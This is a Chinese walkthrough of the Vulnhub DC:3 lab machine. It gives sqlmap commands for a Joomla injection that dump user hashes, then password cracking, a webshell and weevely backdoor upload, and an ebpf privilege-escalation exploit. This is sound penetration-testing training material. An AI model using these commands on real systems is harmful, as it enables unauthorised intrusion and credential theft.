Vulnhub入门实战3-DC:3

Posted TzZzEZ-web

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Vulnhub入门实战3-DC:3相关的知识,希望对你有一定的参考价值。

Vulnhub入门实战3-DC:3

VMware镜像下载链接

在这里插入图片描述
首先探寻一下靶机的ip地址。
在这里插入图片描述
使用nmap进行端口扫描。
在这里插入图片描述
只开通了一个80端口,通过浏览器进行访问。
在这里插入图片描述
收集到该网站的CMS使用的是joomla。使用joomscan探测版本号。
joomscan --url http://192.168.43.219:80/
在这里插入图片描述
确定版本号后,使用searchsploit搜索该版本的漏洞。
在这里插入图片描述
该版本存在sql注入漏洞。

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt sql.txt
cat sql.txt

在这里插入图片描述
根据漏洞检测信息,使用sqlmap进行注入。

sqlmap -u "http://192.168.43.219:80/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]  

在这里插入图片描述
查看joomladb数据库。

sqlmap -u "http://192.168.43.219:80/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering] 

在这里插入图片描述
查看users表单。

sqlmap -u "http://192.168.43.219:80/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

在这里插入图片描述
根据一开始的登录页面,我们需要name和password。

sqlmap -u "http://192.168.43.219:80/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

在这里插入图片描述
得到admin的密码的加密值,保存下来,使用john爆破。

vim passwd.txt
john passwd.txt

在这里插入图片描述
密码是snoopy(挺可爱的)。
之前joomscan扫描到后台http://192.168.43.219/administrator/,使用admin账户密码登录。
进入后,Extensions->templates->Beez3中存在文件上传漏洞,传入一句话木马,使用蚁剑连接。
在这里插入图片描述
在这里插入图片描述
·
使用weevley生成后门反弹个shell出来。

weevely generate 111 shell.php 

在这里插入图片描述
将生成的后门木马进行上传,再用weevley进行连接。
在这里插入图片描述
在这里插入图片描述
得到了靶机的shell,下一步就是提权操作了。
查看一下系统的内核。
在这里插入图片描述
操作系统为ubuntu 16.04
使用searchsploit查看该操作系统有啥提权的方法。
在这里插入图片描述

找到一个本地权限提升的exp。
cp下来看看。
在这里插入图片描述
在这里插入图片描述
从github上将注入文件下载下来。
在这里插入图片描述
将压缩包成功上传。

cd /tmp
unzip 39772.zip
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./complie.sh	#编译出错,不要紧
./doubleput

在这里插入图片描述
解决问题。

以上是关于Vulnhub入门实战3-DC:3的主要内容,如果未能解决你的问题,请参考以下文章

Vulnhub入门实战-Wakanda

Vulnhub入门实战-Wakanda

Vulnhub入门实战2-DC:2

Vulnhub入门实战2-DC:2

Vulnhub靶机渗透测试实战:入门DC-1靶机完全渗透

Vulnhub入门实战 4-DC:4